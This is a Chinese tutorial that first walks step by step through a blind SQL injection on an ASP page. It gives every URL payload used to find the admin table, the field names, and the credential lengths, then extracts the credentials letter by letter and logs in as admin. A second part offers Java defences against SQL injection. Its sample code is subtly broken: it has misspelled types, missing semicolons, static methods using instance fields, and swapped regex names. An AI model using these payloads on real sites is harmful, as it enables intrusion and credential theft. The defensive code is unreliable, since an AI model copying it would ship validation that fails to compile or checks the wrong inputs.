举例一个来自网上的典型sql注入的过程分析:
如: 打开:http://hostlocal/test2/list.asp?id=17在其后面加'为http://hostlocal/test2/list.asp?id=17'
出错!显示为:“数据库出错”。那么接下来我们便进行如下操作:
1 猜管理员帐号表。
2 猜相应表中的用户的字段名以及密码的字段名。
3 猜出用户名的长度和密码的长度
4 猜出用户和密码
5 找到管理页面进入管理
猜管理员的表:
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin)'//min(id)返回表中ID最小值
返回文章证明,有一个admin的表;如果没有返回文章,证明出错不存在admin这个表。
猜用户的字段名:
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where user='aaa')返回错误信息,表示没有user这个用户段名
再来!~~~http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where username='aaa')
没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在username个字段,只是用户名不是aaa
猜密码的字段名:
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where passwd='aaa')返回错误信息表示没有passwd这个密码字段名。
再来:http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where password=aaa')没有返回错误信息,又没有返回文章,提示找不到文章。证明在admin中存在password这个字段,只是密码不是aaa
猜用户字段名长度:
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)
>5)
正确
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)<10)
正确
用户名长度大于5小于10
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(username)
=7)
呵``` 用户名长度为7位
猜密码长度:
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(password)>5)
正确
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(password)<10)
正确
密码长度也是大于5小于10
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where len(password)=7)
呵``` 密码长度为7位
猜用户名:
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where mid(username,1,1)='a')
用户名第一个字母是:a
猜用户名第二位:http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where mid(username,2,1)='b')
以此类推!
猜密码:
猜密码跟猜用户名一样!
http://hostlocal/test2/list.asp?id=17 and 1=(select min(id) from admin where mid(password,1,1)='a')
猜完后来到管理页面:
http://hostlocal/test2/admin.asp
登录
接来来讲述如何防范基于java web开发平台的sql注入防范
一、编写数据验证类
parameterCheck.java
public class parameterCheck{
String emailregex="[’\\w_-]+(\\. [’\\w_-]+)*@[’\\w_-]+(\\.[’\\w_-]+)*\\.[a-zA-Z]{2,4}";
String intregex="^(\\d{5}-\\d{4})| (\\d{5})$";
Stirng zipregex="^-[0-9]+$|^[0-9] +$";
public static Boolean isEmail(string emailString){
return java.util.regex.Pattern.compile(emailregex).matcher(emailString).matches();
}
public static boolean isInt(string intString){
return java.util.regex.Pattern.compile(intregex).matcher(intString).matches();
}
public static boolean isZip(string zipString){
return java.util.regex.Pattern.compile(zipregex).matcher(zipString).matches(); }
}
注:
三种regex 匹配方法 其中public boolean matches(String regex) 此方法调用的 str.matches(regex) 形式与第二种表达式产生完全相同的结果
如果要多次使用一种模式,第三种方法编译一次后重用此模式比每次都调用此方法效率更高。
1.public Boolean java.lang.String.matchs(String regex);
2.public Boolean java.util.regex.Pattern.matches(regex, input);
3.public Boolean java.util.regex.Pattern.compile(regex).matcher(input).matches()
二、始终使用预编译preparedStatement 代替 statement
PreparedStatement pstmt = con.prepareStatement("UPDATE EMPLOYEES
SET SALARY = ? WHERE ID = ?");
pstmt.setBigDecimal(1, 153833.00)
pstmt.setInt(2, 110592)
预编译首先从名字上就知道提高了程序的执行性能,同时在代码上提高了可读性,最重要的是
在安全性上
三、 使用存储过程
存储过程是数据库端的,经过预编译的过程,在安全性上主要对是一些使用运算符(如 AND 或 OR)将命令附加到有效输入参数值的攻击。在应用程序受到攻击时,存储过程还可以隐藏业务规则的实现。
JDBC API 提供了一个存储过程 SQL 转义语法,该语法允许对所有 RDBMS 使用标准方式调用存储过程。
public interface CallableStatement extends PreparedStatement
无返回结果的过程语法:
{call 过程名[(?, ?, ...)]}
返回结果参数的过程的语法为:
{? = call 过程名[(?, ?, ...)]}
不带参数的已储存过程的语法类似:
{call 过程名}
|
